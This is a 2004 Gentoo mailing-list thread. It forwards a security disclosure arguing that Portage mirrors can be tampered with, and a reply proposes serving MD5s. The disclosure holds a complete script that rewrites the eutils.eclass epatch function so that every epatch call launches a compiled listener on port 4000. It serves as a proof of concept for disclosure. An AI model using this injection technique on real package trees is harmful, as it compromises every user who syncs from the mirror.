1 |
Then perhaps it's time to have a simple mirror that only servers |
2 |
portage MD5s, for example :) |
3 |
|
4 |
|
5 |
On Sat, 06 Nov 2004 15:56:32 -0500, Joshua Brindle <method@g.o> wrote: |
6 |
> perhaps some motivation for portage devs.... |
7 |
> |
8 |
> -------- Original Message -------- |
9 |
> Subject: [gentoo-security] Trojan for Gentoo, part 2 |
10 |
> Date: Sat, 06 Nov 2004 21:16:11 +0100 |
11 |
> From: Alexander Holler <holler@××××××××××.de> |
12 |
> To: gentoo-security@l.g.o |
13 |
> |
14 |
> Hi, |
15 |
> |
16 |
> after 1.5 years (2 years after the bug could could found in bugzilla) it |
17 |
> seems that one of the highest security risks is closed. At least I've |
18 |
> seen something about signed ebuilds. (see |
19 |
> http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ). |
20 |
> |
21 |
> Time for the next part. I've already written a bug for that a year ago, |
22 |
> but it was now closed a second time by "the ... gatekeeper". |
23 |
> |
24 |
> See bug #26110 |
25 |
> |
26 |
> Here's the next small script. If you are operating a gentoo mirror, or |
27 |
> having access to one, feel free to play with it. |
28 |
> |
29 |
> If you are a user, the only practical way to ensure a minimum of |
30 |
> security is to sync twice: |
31 |
> (a) sync, |
32 |
> (b) delete timestap, |
33 |
> (c) sync with other mirror and |
34 |
> (d) look if no files where different, otherwise restart with (a) |
35 |
> |
36 |
> ----------------gentooTrojan.sh--------------------------- |
37 |
> #!/bin/sh |
38 |
> if [ ${#} -ne 1 ] ; then |
39 |
> echo "This script puts a silly trojan into Gentoo's portage." |
40 |
> echo "Usage: `basename ${0}` PathToPortage" |
41 |
> exit 1 |
42 |
> fi |
43 |
> |
44 |
> mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass |
45 |
> sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with |
46 |
> telnet localhost 4000.\nKill it with killall |
47 |
> GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' |
48 |
> <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass |
49 |
> cat >${1}/eclass/GentooTrojan.c << EOF |
50 |
> #include <unistd.h> |
51 |
> #include <sys/socket.h> |
52 |
> #include <netinet/in.h> |
53 |
> #include <string.h> |
54 |
> |
55 |
> int main(void) |
56 |
> { |
57 |
> struct sockaddr_in serv; |
58 |
> struct sockaddr_in cli; |
59 |
> int sock; |
60 |
> sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); |
61 |
> if (sock < 0) |
62 |
> return 1; |
63 |
> bzero((char *) &serv, sizeof(serv)); |
64 |
> serv.sin_family = AF_INET; |
65 |
> serv.sin_addr.s_addr = htonl(INADDR_ANY); |
66 |
> serv.sin_port = htons(4000); |
67 |
> if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) |
68 |
> return 1; |
69 |
> if (listen(sock, 5) < 0) |
70 |
> return 1; |
71 |
> while (1) { |
72 |
> int scli; |
73 |
> int slen; |
74 |
> static char *str="Your are listing to the famous Gentoo trojan!\n"; |
75 |
> slen = sizeof(cli); |
76 |
> scli = accept(sock, (struct sockaddr *) &cli, |
77 |
> (socklen_t *) &slen); |
78 |
> write(scli, str, strlen(str)); |
79 |
> close(scli); |
80 |
> } |
81 |
> } |
82 |
> EOF |
83 |
> |
84 |
> gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c |
85 |
> |
86 |
> echo "Done. Portage successful infected with a trojan." |
87 |
> echo "Just emerge an ebuild which uses epatch and do a" |
88 |
> echo " telnet localhost 4000" |
89 |
> echo "afterwards." |
90 |
> ------------------------------------------- |
91 |
> |
92 |
> Kind regards, |
93 |
> |
94 |
> Alexander Holler |
95 |
> |
96 |
> PS: Please don't reply to me, I don't read any Gentoo mailing lists |
97 |
> anymore, in fact I even don't know why I'm writting this message, as I |
98 |
> already have lost every interest in Gentoo some time ago. |
99 |
> |
100 |
> PPS: Sorry for that hard words, but that all reminds me on Microsoft. |
101 |
> The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting |
102 |
> forgotten, ignored or fixed in the same time. |
103 |
> |
104 |
> PPPS: I really appreciate all the very good work on hardened gcc, |
105 |
> selinux-profiles and so on, but for me, this all seems useless as long |
106 |
> as the base is compromised that easy and the user has no practical way |
107 |
> (e.g. hashs) to check what he gets on his machine with a 'sync'. |
108 |
> |
109 |
> -- |
110 |
> gentoo-security@g.o mailing list |
111 |
> |
112 |
> -- |
113 |
> gentoo-dev@g.o mailing list |
114 |
> |
115 |
> |
116 |
|
117 |
|
118 |
-- |
119 |
Ioannis Aslanidis |
120 |
<deathwing00[at]forums.gentoo.org> 0xC2539DA3 |
121 |
<aioannis[at]tinet.org> 0xF202D067 |
122 |
<dwcommander[at]users.sourceforge.net> |
123 |
|
124 |
Hellenic Gentoo GNU/Linux project manager (http://hellenicgentoo.sf.net) |
125 |
FIRECOPS++ project manager (http://firecops.sf.net) |
126 |
Gentoo Forums Global Moderator (http://forums.gentoo.org) |
127 |
|
128 |
Computer Engineering student at Universitat Rovira i Virgili |
129 |
|
130 |
-- |
131 |
gentoo-dev@g.o mailing list |